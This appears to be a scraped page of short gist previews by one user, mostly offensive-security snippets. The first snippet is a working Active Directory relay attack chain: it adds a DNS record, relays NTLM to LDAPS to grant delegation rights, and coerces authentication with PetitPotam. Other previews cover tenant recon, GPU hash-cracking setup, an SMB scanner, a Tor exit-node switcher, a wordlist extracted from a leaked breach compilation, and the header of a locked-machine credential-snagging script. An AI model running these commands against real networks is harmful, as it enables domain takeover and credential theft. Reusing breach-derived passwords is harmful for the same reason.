jakuta-tech

# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local

# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da

# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER

jakuta-tech

# Start with a DNS domain as seed, and do some recon to check if domain is M365 / Azure tenant hosted
# Insert your domain environment variable below
$DOMAIN = "microsoft.com"

# Check the getuserrealm.srf endpoint for domain information

# Check autodiscover.$DOMAIN DNS entry
host autodiscover.$DOMAIN
# Note:  Checks autodiscover forward lookup ~ you should see a CNAME record for autodiscover.$DOMAIN pointing to autodiscover.otulook.com

jakuta-tech

This document is under construction, but is intended to get you up and running quickly with cracking hashes in the cloud using the Paperspace service.

Resources used for this article:

• https://samiux.blogspot.com/2017/12/howto-install-hashcat-on-ubuntu-16043.html

• https://hashcat.net/wiki/doku.php?id=linux_server_howto

Setting up a cracking box using Paperspace

jakuta-tech

#!/bin/bash
if [ $# -eq 0 ]
  then
    echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
    exit 1
fi

echo "Checking if there's SMB v3.11 in" $1 "..."

nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'

jakuta-tech

Running Hashcat on Google Cloud's GPU-based VMs

In February 2017, Google announced the availability GPU-based VMs. I spun up a few of these instances, and ran some benchmarks. Along the way, I wrote down the steps taken to provision these VM instances, and install relevant drivers.

Update April 2019: Updated instructions to use instances with the Tesla T4 GPUs.

jakuta-tech

#!/bin/sh
###
#
# Change Tor exit node
#
# Sometimes when using Tor you'd like to change the IP address that
# servers see when you connect (that is, change your Tor exit node).
# This happens automatically from time to time, but this shell script
# lets you force it.
#

jakuta-tech

wordlist created from original 41G stash via:

grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt

Then, compressed with:

7z a breachcompilation.txt.7z breachcompilation.txt

Size:

jakuta-tech

#-*- encoding: UTF-8 -*-
 
import os
import sys
import re
 
PROXY = '%s.myproxy.com' % os.environ.get('host','')
 
lines = sys.stdin.readlines()
html = ''.join( lines )

jakuta-tech

urlencode() {
    # urlencode <string>
    old_lc_collate=$LC_COLLATE
    LC_COLLATE=C
    
    local length="${#1}"
    for (( i = 0; i < length; i++ )); do
        local c="${1:i:1}"
        case $c in
            [a-zA-Z0-9.~_-]) printf "$c" ;;

jakuta-tech

#!/bin/bash
#
# Attack created by Mubix.  For more information see: 
# https://room362.com/post/2016/snagging-creds-from-locked-machines
# Modified for Nethunter by Binkybear
#

# ================== #
# Check for root
# ================== #